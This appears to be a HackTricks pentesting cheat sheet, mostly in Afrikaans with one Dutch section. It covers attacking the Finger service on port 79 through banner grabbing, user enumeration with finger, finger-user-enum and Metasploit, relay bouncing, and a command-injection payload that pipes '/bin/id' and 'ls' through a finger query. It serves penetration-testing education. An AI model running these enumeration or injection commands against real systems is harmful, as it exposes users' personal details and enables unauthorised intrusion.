5.1 KiB
79 - Pentesting Finger
Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)!
Ander maniere om HackTricks te ondersteun:
- As jy jou maatskappy geadverteer wil sien in HackTricks of HackTricks in PDF wil aflaai, kyk na die SUBSCRIPTION PLANS!
- Kry die amptelike PEASS & HackTricks swag
- Ontdek The PEASS Family, ons versameling eksklusiewe NFTs
- Sluit aan by die 💬 Discord-groep of die telegram-groep of volg ons op Twitter 🐦 @carlospolopm.
- Deel jou hacktruuks deur PR's in te dien by die HackTricks en HackTricks Cloud github-repos.
Basiese Inligting
Die Finger program/diens word gebruik om inligting oor rekenaargebruikers te bekom. Tipies sluit die verskafte inligting die gebruikers se aanmeldingsnaam, volle naam en, in sommige gevalle, addisionele besonderhede in. Hierdie addisionele besonderhede kan die kantoorlokasie en telefoonnommer (indien beskikbaar), die tyd waarop die gebruiker aangemeld het, die tydperk van onaktiwiteit (idle time), die laaste keer wat die gebruiker e-pos gelees het, en die inhoud van die gebruiker se plan- en projeklêers insluit.
Verstekpoort: 79
PORT STATE SERVICE
79/tcp open finger
Opname
Banner Grabbing/ Basiese verbinding
nc -vn <IP> 79
echo "root" | nc -vn <IP> 79
Gebruikersopsporing
User enumeration, ook wel bekend als fingerdienst, is een techniek die wordt gebruikt om informatie te verzamelen over gebruikers op een doelsysteem. Het maakt gebruik van de Finger-protocoldienst om informatie zoals gebruikersnamen, volledige namen, e-mailadressen en andere details te verkrijgen.
De Finger-protocoldienst is standaard geïnstalleerd op veel Unix-gebaseerde systemen. Het stelt gebruikers in staat om informatie over andere gebruikers op te vragen door simpelweg hun gebruikersnaam in te voeren. Deze informatie kan nuttig zijn voor een aanvaller, omdat het hen kan helpen bij het identificeren van mogelijke doelwitten en het vergroten van hun kennis over het doelsysteem.
Om gebruikersopsporing uit te voeren, kan een aanvaller verschillende tools en technieken gebruiken, zoals het gebruik van de finger
-opdracht op de opdrachtregel, het gebruik van geautomatiseerde scripts of het gebruik van specifieke tools zoals enum4linux
voor Windows-systemen.
Het is belangrijk op te merken dat gebruikersopsporing een potentieel risico vormt voor de privacy en beveiliging van gebruikers. Daarom is het belangrijk voor systeembeheerders om de Finger-protocoldienst uit te schakelen of te beperken om ongeautoriseerde toegang tot gebruikersinformatie te voorkomen.
finger @<Victim> #List users
finger admin@<Victim> #Get info of user
finger user@<Victim> #Get info of user
Alternatiewelik kan jy finger-user-enum van pentestmonkey gebruik, hier is 'n paar voorbeelde:
finger-user-enum.pl -U users.txt -t 10.0.0.1
finger-user-enum.pl -u root -t 10.0.0.1
finger-user-enum.pl -U users.txt -T ips.txt
Nmap voer 'n skrip uit om standaard skripte te gebruik
Metasploit gebruik meer truuks as Nmap
use auxiliary/scanner/finger/finger_users
Shodan
port:79 GEBRUIKER
Opdrag uitvoering
finger "|/bin/id@example.com"
finger "|/bin/ls -a /@example.com"
Vinger Stuiter
Gebruik 'n stelsel as 'n vinger relais
finger user@host@victim
finger @internal@external
Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)!
Ander maniere om HackTricks te ondersteun:
- As jy wil sien dat jou maatskappy geadverteer word in HackTricks of HackTricks aflaai in PDF-formaat, kyk na die SUBSCRIPTION PLANS!
- Kry die amptelike PEASS & HackTricks swag
- Ontdek The PEASS Family, ons versameling eksklusiewe NFTs
- Sluit aan by die 💬 Discord-groep of die telegram-groep of volg ons op Twitter 🐦 @carlospolopm.
- Deel jou hacking-truuks deur PR's in te dien by die HackTricks en HackTricks Cloud GitHub-opslagplekke.